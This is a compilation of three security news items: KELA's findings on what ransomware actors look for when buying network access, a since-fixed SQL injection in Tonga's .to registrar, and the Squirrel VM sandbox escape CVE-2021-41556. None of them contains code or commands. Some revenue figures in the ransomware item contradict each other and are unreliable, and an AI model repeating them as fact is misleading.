KELA identified 48 comment threads on dark web forums in July 2021 in this regard. Users alleged to be digital attackers trying to purchase network access. Approximately tow-fifth of the threads were established by individuals associated with Ransomware-as-a-Service (RaaS) schemes, comprising operators, associates, and middlemen, according to the intelligence solutions provider. KELA learned from those conversation threads that ransomware attackers hunt for specific criteria when purchasing accesses. 

These elements include the following: 

  • Geographically, almost half (47 percent) of ransomware attackers identified the United States as the preferred destination for their targets. Canada, Australia, and European countries were next on the list, with preferences of 37%, 37%, and 31%, respectively. 

  • Revenue: On aggregate, ransomware attackers expected their victims to make at least $100 million, while they occasionally indicated various ransom sums for different places. Attackers stated that they sought more than $5 million in compensation for victims in the United States, as well as at least $40 million in revenue from "third-world" countries. 

  • Disallowed Industries: Almost half (47%) of ransomware attackers indicated they were unwilling to pay for admission to companies involved in health care and education. Slightly fewer (37 percent) declined to target the government sector, while over a quarter of ransomware perpetrators stated that they would not purchase access to non-profit organizations. 

  • Countries Excluded: Some attackers declined to target companies or government agencies in Russian-speaking countries. They appear to have selected this based on the idea that if they did not target the region, local law enforcement would not worry them. Others ruled out targeting South America or third-world countries as a region. They reasoned that an attack there would not net them enough money. 

The aforementioned data is compatible with several of the ransomware assaults that made the headlines earlier in 2021. 

For instance, consider the attack on the Colonial Pipeline. As per Dun & Bradstreet, the Colonial Pipeline Company, headquartered in Port Arthur, Texas, earned $1.32 billion in revenue in 2020. The business doesn't operate in any of the prohibited industries listed above. Colonial, on the other hand, is a key infrastructure company in the United States. Due to the attacks like this, the FBI as well as other federal law enforcement agencies targeted the DarkSide RaaS gang just after the attack.

Another instance that met the same requirements was the Kaseya supply chain attack. The headquarters of the IT management software company is in Miami, Florida. Furthermore, Kaseya was valued at more than $2 billion by the end of 2019. 

According to KELA, businesses and government institutions could defend themselves from such ransomware attacks in three ways. Firstly, companies could train the employees and the C-suite through security awareness training. This will educate them on how to protect their data and identify suspicious activities on their employer's networks. Secondly, they could utilize vulnerability management to keep an eye on their systems for known flaws. They could then address such faults first. Finally, they could use an up-to-date asset inventory to keep an eye on their devices and systems for unusual behavior.

Due to a Vulnerability in the TLD Registrar's Website, Attackers May Have Modified the Nameservers

 

Due to a vulnerability in the TLD registrar's website, attackers may have changed the name-servers of any domain under Tonga's country code top-level domain (ccTLD), according to security researchers. With approximately 513 million results from a Google search for '.to' pages, the weakness provided potential miscreants with a plethora of potential targets for a variety of large-scale attacks. The Tonga Network Information Center (Tonic) was "extremely quick" in resolving the bug in under 24 hours after online security firm Palisade exposed the issue, following a pen test, on October 8, 2021, according to a Palisade blog post. 

Sam Curry and other Palisade researchers uncovered an SQL injection vulnerability on the registrant website, which could be used to gain plaintext DNS master passwords for.to domains. Once signed in, they may modify the DNS settings for these domains and redirect traffic to their own website. According to Curry, the attacker might then steal cookies and local browser storage and therefore access victim sessions, among other assaults. 

An attacker may send crafted accounts if they gained control of google.to, an official Google domain for redirects and OAuth authorization processes. OAuth is a popular authorization mechanism that allows websites and web applications to request limited access to another application's user account. Importantly, OAuth enables the user to authorize this access without revealing their login credentials to the requesting application. This implies that instead of handing over complete control of their account to a third party, users can fine-tune which data they want to disclose. 

The fundamental OAuth protocol is extensively used to integrate third-party functionality that requires access to certain data from a user's account. For example, an application may utilise OAuth to request access to your email contacts list in order to recommend individuals to connect with. The same approach, however, is also used to enable third-party authentication services, allowing users to log in with an account they have with another website. 

As with .io, .to domains are extensively used to generate short links that are used to reset user passwords, for affiliate marketing, and to drive users to company resources. Curry argued that link shortening services used by Amazon (amzn.to), Uber (ubr.to), and Verizon (vz.to) may have been misused by altering the '.to' pages to which these giant brands' tweets connected for their millions of Twitter followers. 

Curry speculated that attackers "could likely steal a very big amount of money" from customers of tether.to, the official platform for purchasing Tether stable coin - even if they "only owned this domain for a short period of time." However, Eric Gullichsen, administrator of the.to ccTLD, stated that “various security and monitoring and throttling systems we already had in place would have defeated many of the exploits used during the pen test, had the security researchers’ IP addresses not been whitelisted to enable their testing.”

Attackers Could Use a Bug in the Squirrel Engine to Hack Games and Cloud Services

 

An out-of-bounds read vulnerability in the Squirrel programming language allows attackers to bypass sandbox limitations and execute arbitrary code within a Squirrel virtual machine (VM), giving them complete control over the underlying machine. Given where Squirrel lives – in games and embedded in the internet of things (IoT), the bug could endanger the millions of monthly gamers who play video games like Counter-Strike: Global Offensive and Portal 2, as well as cloud services like the Twilio Electric Imp IoT platform, which has an open-source code library that is ready to use. 

The issue is tracked as CVE-2021-41556, and it affects stable release branches 3.x and 2.x of Squirrel. It occurs when a gaming library known as Squirrel Engine is used to execute untrusted code. On August 10, 2021, the vulnerability was responsibly disclosed. The Squirrel Engine was designed to be a model for multi-core gaming engine efficiency. It's designed to get the most out of high-end computer hardware. 

Squirrel is an open-source object-oriented programming language used for customization and plugin development in video games and cloud applications. It's a scripting language that fits the size, memory bandwidth, and real-time demands of video games and embedded systems. 

"In a real-world scenario, an attacker could embed a malicious Squirrel script into a community map and distribute it via the trusted Steam Workshop," researchers Simon Scannell and Niklas Breitfeld said in a report. "When a server owner downloads and installs this malicious map onto his server, the Squirrel script is executed, escapes its VM, and takes control of the server machine." 

When defining Squirrel classes, the security problem involves "out-of-bounds access via index confusion." The fact that bitflags are set within indexes is problematic since it is absolutely conceivable for an attacker to establish a class definition with 0x02000000 methods, the researchers explained. 

The flaw is severe because it allows a malicious actor to create a false array that can read and write values. The researchers discovered that overwriting function pointers allowed them to "hijack the control flow of the programme and take full control of the Squirrel VM." 

While the problem was fixed as part of a code commit on September 16, the modifications have yet to be included in a new stable release, with the most recent official version (v3.1) being issued on March 27, 2016. Maintainers that utilize Squirrel in their projects should apply the available repair commit to protect themselves from assaults, according to the researchers who found the issue.